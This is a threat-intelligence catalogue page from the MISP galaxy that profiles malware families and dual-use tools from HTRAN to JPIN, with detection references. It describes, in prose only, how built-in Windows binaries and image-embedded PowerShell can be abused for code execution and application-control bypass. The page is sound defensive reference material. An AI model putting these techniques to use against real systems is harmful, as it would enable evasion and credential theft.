Internal MISP references
UUID b98d9fe7-9aa3-409a-bf5c-eadb01bac948 which can be used as unique global reference for HTRAN in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S0040 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
HTTPBrowser
HTTPBrowser is malware that has been used by several threat groups. [ThreatStream Evasion Analysis] [Dell TG-3390] It is believed to be of Chinese origin. [ThreatConnect Anthem]
Internal MISP references
UUID c4fe23f7-f18c-40f6-b431-0b104b497eaa which can be used as unique global reference for HTTPBrowser in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0070 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
httpclient
httpclient is malware used by Putter Panda. It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. [CrowdStrike Putter Panda]
Internal MISP references
UUID bf19eba4-7ea1-4c24-95c6-6bcfb44f4c49 which can be used as unique global reference for httpclient in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0068 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Hydraq
Hydraq is a data-theft trojan first used by Elderwood in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including APT17.[MicroFocus 9002 Aug 2016][Symantec Elderwood Sept 2012][Symantec Trojan.Hydraq Jan 2010][ASERT Seven Pointed Dagger Aug 2015][FireEye DeputyDog 9002 November 2013][ProofPoint GoT 9002 Aug 2017][FireEye Sunshop Campaign May 2013][PaloAlto 3102 Sept 2015]
Internal MISP references
UUID 4ffbca79-358a-4ba5-bfbb-dc1694c45646 which can be used as unique global reference for Hydraq in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0203 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
HyperBro
HyperBro is a custom in-memory backdoor used by Threat Group-3390.[Unit42 Emissary Panda May 2019][Securelist LuckyMouse June 2018][Hacker News LuckyMouse June 2018]
Internal MISP references
UUID 57cec527-26fb-44a1-b1a9-506a3af2c9f2 which can be used as unique global reference for HyperBro in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0398 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
HyperStack
HyperStack is a RPC-based backdoor used by Turla since at least 2018. HyperStack has similarities to other backdoors used by Turla including Carbon.[Accenture HyperStack October 2020]
Internal MISP references
UUID ba3236e9-c86b-4b5d-89ed-7f71940a0588 which can be used as unique global reference for HyperStack in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0537 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
IceApple
IceApple is a modular Internet Information Services (IIS) post-exploitation framework, that has been used since at least 2021 against the technology, academic, and government sectors.[CrowdStrike IceApple May 2022]
Internal MISP references
UUID 5a73defd-6a1a-4132-8427-cec649e8267a which can be used as unique global reference for IceApple in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1022 |
| source | MITRE |
| type | ['malware'] |
IcedID
IcedID is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. IcedID has been downloaded by Emotet in multiple campaigns.[IBM IcedID November 2017][Juniper IcedID June 2020]
Internal MISP references
UUID 7f59bb7c-5fa9-497d-9d8e-ba9349fd9433 which can be used as unique global reference for IcedID in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0483 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ie4uinit
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Executes commands from a specially prepared ie4uinit.inf file.
Author: Oddvar Moe
Paths: * c:\windows\system32\ie4uinit.exe * c:\windows\sysWOW64\ie4uinit.exe * c:\windows\system32\ieuinit.inf * c:\windows\sysWOW64\ieuinit.inf
Resources: * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Detection: * IOC: ie4uinit.exe copied outside of %windir% * IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir% * Sigma: proc_creation_win_lolbin_ie4uinit.yml[Ie4uinit.exe - LOLBAS Project]
Internal MISP references
UUID 332e37c0-63fe-4e99-85a9-94210d42c21d which can be used as unique global reference for Ie4uinit in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5116 |
| source | Tidal Cyber |
| tags | ['f32f1513-7277-4257-9c35-c8ab3da17c84', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Ieadvpack
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.
Author: LOLBAS Team
Paths: * c:\windows\system32\ieadvpack.dll * c:\windows\syswow64\ieadvpack.dll
Resources: * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ * https://twitter.com/pabraeken/status/991695411902599168 * https://twitter.com/0rbz_/status/974472392012689408
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml * Splunk: detect_rundll32_application_control_bypass___advpack.yml[Ieadvpack.dll - LOLBAS Project]
Internal MISP references
UUID e1aa3cbd-2337-47d6-b6b0-beb5d1bbfc1e which can be used as unique global reference for Ieadvpack in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5190 |
| source | Tidal Cyber |
| tags | ['e794994d-c38a-44d9-9253-53191ca9e56b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
iediagcmd
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Diagnostics Utility for Internet Explorer
Author: manasmbellani
Paths: * C:\Program Files\Internet Explorer\iediagcmd.exe
Resources: * https://twitter.com/Hexacorn/status/1507516393859731456
Detection: * Sigma: https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml * IOC: Sysmon Event ID 1 * IOC: Execution of process iediagcmd.exe with /out could be suspicious[iediagcmd.exe - LOLBAS Project]
Internal MISP references
UUID 1feba268-9fff-495f-94e9-5b46336bff3b which can be used as unique global reference for iediagcmd in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5117 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Ieexec
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
Resources: * https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
Detection: * Sigma: proc_creation_win_lolbin_ieexec_download.yml * Elastic: defense_evasion_unusual_process_network_connection.toml * Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * IOC: Network connections originating from ieexec.exe may be suspicious[Ieexec.exe - LOLBAS Project]
Internal MISP references
UUID e7ede205-4d50-42c3-92d0-4988aca5c4a1 which can be used as unique global reference for Ieexec in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5118 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Ieframe
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Internet Browser DLL for translating HTML code.
Author: LOLBAS Team
Paths: * c:\windows\system32\ieframe.dll * c:\windows\syswow64\ieframe.dll
Resources: * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ * https://twitter.com/bohops/status/997690405092290561 * https://windows10dll.nirsoft.net/ieframe_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Ieframe.dll - LOLBAS Project]
Internal MISP references
UUID 57072f02-06c1-4267-b665-fbbf72b96bb4 which can be used as unique global reference for Ieframe in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5191 |
| source | Tidal Cyber |
| tags | ['fc23fb85-8c48-4f0b-aeb6-b78fd6e25e0a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
ifconfig
ifconfig is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. [Wikipedia Ifconfig]
Internal MISP references
UUID 93ab16d1-625e-4b1c-bb28-28974c269c47 which can be used as unique global reference for ifconfig in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0101 |
| source | MITRE |
| type | ['tool'] |
iKitten
iKitten is a macOS exfiltration agent [objsee mac malware 2017].
Internal MISP references
UUID 71098f6e-a2c0-434f-b991-6c079fd3e82d which can be used as unique global reference for iKitten in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0278 |
| source | MITRE |
| type | ['malware'] |
Ilasm
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: used for compile c# code into dll or exe.
Author: Hai vaknin (lux)
Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
Resources: * https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
Detection: * IOC: Ilasm may not be used often in production environments (such as on endpoints) * Sigma: proc_creation_win_lolbin_ilasm.yml[Ilasm.exe - LOLBAS Project]
Internal MISP references
UUID 492104c0-79d6-461e-9dc5-0e4bfd3f2387 which can be used as unique global reference for Ilasm in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5119 |
| source | Tidal Cyber |
| tags | ['8bcce456-e1dc-4dd0-99a9-8334fd6f2847', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
IMEWDBLD
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft IME Open Extended Dictionary Module
Author: Wade Hickey
Paths: * C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
Resources: * https://twitter.com/notwhickey/status/1367493406835040265
Detection: * Sigma: net_connection_win_imewdbld.yml[IMEWDBLD.exe - LOLBAS Project]
Internal MISP references
UUID 2ef7c673-a0dc-4773-a9fd-337ed68d9b0b which can be used as unique global reference for IMEWDBLD in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5115 |
| source | Tidal Cyber |
| tags | ['796962fe-56d7-4816-9193-153da0be7c10', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Imminent Monitor
Imminent Monitor was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.[Imminent Unit42 Dec2019]
Internal MISP references
UUID 925fc0db-9315-4703-9353-1d0e9ecb1439 which can be used as unique global reference for Imminent Monitor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0434 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Impacket
Impacket is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. Impacket contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.[Impacket Tools]
Internal MISP references
UUID cf2c5666-e8ad-49c1-ac8f-30ed65f9e52c which can be used as unique global reference for Impacket in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0357 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', '61cdbb28-cbfd-498b-9ab1-1f14337f9524', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '6a80006a-ff1c-48e8-bb6f-d109d7b7a2fc', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Industroyer
Industroyer is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.[ESET Industroyer] Industroyer was used in the attacks on the Ukrainian power grid in December 2016.[Dragos Crashoverride 2017] This is the first publicly known malware specifically designed to target and impact operations in the electric grid.[Dragos Crashoverride 2018]
Internal MISP references
UUID 09398a7c-aee5-44af-b99d-f73d3b39c299 which can be used as unique global reference for Industroyer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0604 |
| source | MITRE |
| tags | ['37dff778-95a6-4e51-a26a-1d399ef713be'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Industroyer2
Industroyer2 is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in Industroyer. Security researchers assess that Industroyer2 was designed to cause impact to high-voltage electrical substations. The initial Industroyer2 sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.[Industroyer2 Blackhat ESET]
Internal MISP references
UUID 53c5fb76-a690-55c3-9e02-39577990da2a which can be used as unique global reference for Industroyer2 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S1072 |
| source | MITRE |
| tags | ['37dff778-95a6-4e51-a26a-1d399ef713be'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Infdefaultinstall
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used to perform installation based on content inside inf files
Author: Oddvar Moe
Paths: * C:\Windows\System32\Infdefaultinstall.exe * C:\Windows\SysWOW64\Infdefaultinstall.exe
Resources: * https://twitter.com/KyleHanslovan/status/911997635455852544 * https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Detection: * Sigma: proc_creation_win_infdefaultinstall_execute_sct_scripts.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules[Infdefaultinstall.exe - LOLBAS Project]
Internal MISP references
UUID e35b5513-4370-4f8c-b3a6-1f64c65f1e85 which can be used as unique global reference for Infdefaultinstall in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5120 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
InnaputRAT
InnaputRAT is a remote access tool that can exfiltrate files from a victim’s machine. InnaputRAT has been seen out in the wild since 2016. [ASERT InnaputRAT April 2018]
Internal MISP references
UUID e42bf572-1e70-4467-a4b7-5e22c776c758 which can be used as unique global reference for InnaputRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0259 |
| source | MITRE |
| type | ['malware'] |
Installutil
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Resources: * https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md * https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
Detection: * Sigma: proc_creation_win_instalutil_no_log_execution.yml * Sigma: proc_creation_win_lolbin_installutil_download.yml * Elastic: defense_evasion_installutil_beacon.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml[LOLBAS Installutil]
Internal MISP references
UUID c983bb77-b96c-44d5-b3f8-2540d7c604db which can be used as unique global reference for Installutil in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5121 |
| source | Tidal Cyber |
| tags | ['a3f84674-3813-4993-9e34-39cdaa19cbd1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Interactsh
According to joint Cybersecurity Advisory AA23-250A (September 2023), Interactsh is "an open-source tool for detecting external interactions (communication)". The Advisory further states that the tool is "used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity".[U.S. CISA Zoho Exploits September 7 2023]
Internal MISP references
UUID 9ec3777d-9a36-4822-a3e2-a7ce5d296309 which can be used as unique global reference for Interactsh in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5049 |
| source | Tidal Cyber |
| tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee'] |
| type | ['tool'] |
Inveigh
Inveigh is an open-source utility. According to its GitHub project page, it is a "machine-in-the-middle" tool designed for penetration testing purposes.[GitHub Inveigh]
Internal MISP references
UUID 5658f260-8e96-4fa5-9863-189660048e5d which can be used as unique global reference for Inveigh in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5272 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
| type | ['tool'] |
InvisiMole
InvisiMole is a modular spyware program that has been used by the InvisiMole Group since at least 2013. InvisiMole has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. Gamaredon Group infrastructure has been used to download and execute InvisiMole against a small number of victims.[ESET InvisiMole June 2018][ESET InvisiMole June 2020]
Internal MISP references
UUID 3ee4c49d-2f2c-4677-b193-69f16f2851a4 which can be used as unique global reference for InvisiMole in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0260 |
| source | MITRE |
| type | ['malware'] |
Invoke-PSImage
Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. [GitHub Invoke-PSImage]
Internal MISP references
UUID 2200a647-3312-44c0-9691-4a26153febbb which can be used as unique global reference for Invoke-PSImage in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0231 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
IOBit
IOBit is a self-described "freeware" tool that can ostensibly be used to "clean, optimize, speed up and secure" personal computers. According to U.S. cybersecurity authorities, IOBit has been used by adversaries, such as ransomware actors, as part of their operations, for example to disable anti-virus software.[U.S. CISA Play Ransomware December 2023]
Internal MISP references
UUID 9c955014-2d83-4b5b-9127-cfc49e86779f which can be used as unique global reference for IOBit in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5080 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
ipconfig
ipconfig is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. [TechNet Ipconfig]
Internal MISP references
UUID 4f519002-0576-4f8e-8add-73ebac9a86e6 which can be used as unique global reference for ipconfig in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0100 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
IronNetInjector
IronNetInjector is a Turla toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including ComRAT.[Unit 42 IronNetInjector February 2021 ]
Internal MISP references
UUID 9ca96281-8ff9-4619-a79d-16c5a9594eae which can be used as unique global reference for IronNetInjector in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0581 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
ISMInjector
ISMInjector is a Trojan used to install another OilRig backdoor, ISMAgent. [OilRig New Delivery Oct 2017]
Internal MISP references
UUID 752ab0fc-7fa1-4e54-bd9a-7a280a38ed77 which can be used as unique global reference for ISMInjector in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0189 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ixeshe
Ixeshe is a malware family that has been used since at least 2009 against targets in East Asia. [Moran 2013]
Internal MISP references
UUID 6dbf31cf-0ba0-48b4-be82-38889450845c which can be used as unique global reference for Ixeshe in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0015 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Jaguar Tooth
Jaguar Tooth is a malicious software bundle consisting of a series of payloads and patches. Russia-backed APT28 used Jaguar Tooth during a series of compromises involving vulnerable Cisco routers belonging to U.S., Ukrainian, and other entities in 2021.[U.S. CISA APT28 Cisco Routers April 18 2023]
According to an April 2023 UK National Cyber Security Centre technical report on Jaguar Tooth, the malware is deployed and executed via exploitation of CVE-2017-6742, a Simple Network Management Protocol (SNMP) vulnerability for which Cisco released a patch in 2017. Jaguar Tooth deployments allowed actors to collect further device information via execution of Cisco IOS Command Line Interface commands, discover other network devices, and achieve unauthenticated backdoor access to victim systems.[UK NCSC Jaguar Tooth April 18 2023]
Related Vulnerabilities: CVE-2017-6742[U.S. CISA APT28 Cisco Routers April 18 2023]
Internal MISP references
UUID 0eb47e25-56ec-42ba-9850-e50450b853e0 which can be used as unique global reference for Jaguar Tooth in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Network'] |
| software_attack_id | S5061 |
| source | Tidal Cyber |
| tags | ['af5e9be5-b86e-47af-91dd-966a5e34a186', '15787198-6c8b-4f79-bf50-258d55072fee', 'f01290d9-7160-44cb-949f-ee4947d04b6f', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Janicab
Janicab is an OS X trojan that relied on a valid developer ID and oblivious users to install it. [Janicab]
Internal MISP references
UUID a4debf1f-8a37-4c89-8ebc-31de71d33f79 which can be used as unique global reference for Janicab in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0163 |
| source | MITRE |
| type | ['malware'] |
Javali
Javali is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.[Securelist Brazilian Banking Malware July 2020]
Internal MISP references
UUID 853d3d18-d746-4650-a9bd-c36a0e86dd02 which can be used as unique global reference for Javali in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0528 |
| source | MITRE |
| type | ['malware'] |
JCry
JCry is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.[Carbon Black JCry May 2019]
Internal MISP references
UUID 41ec0bbc-65ca-4913-a763-1638215d7b2f which can be used as unique global reference for JCry in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0389 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
JHUHUGIT
JHUHUGIT is malware used by APT28. It is based on Carberp source code and serves as reconnaissance malware. [Kaspersky Sofacy] [F-Secure Sofacy 2015] [ESET Sednit Part 1] [FireEye APT28 January 2017]
Internal MISP references
UUID d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae which can be used as unique global reference for JHUHUGIT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0044 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
JPIN
JPIN is a custom-built backdoor family used by PLATINUM. Evidence suggests developers of JPIN and Dipsind code bases were related in some way. [Microsoft PLATINUM April 2016]
Internal MISP references
UUID c96fce69-6b9c-4bbc-bb42-f6a8fb6eb88f which can be used as unique global reference for JPIN in MISP communities and other software using the MISP galaxy
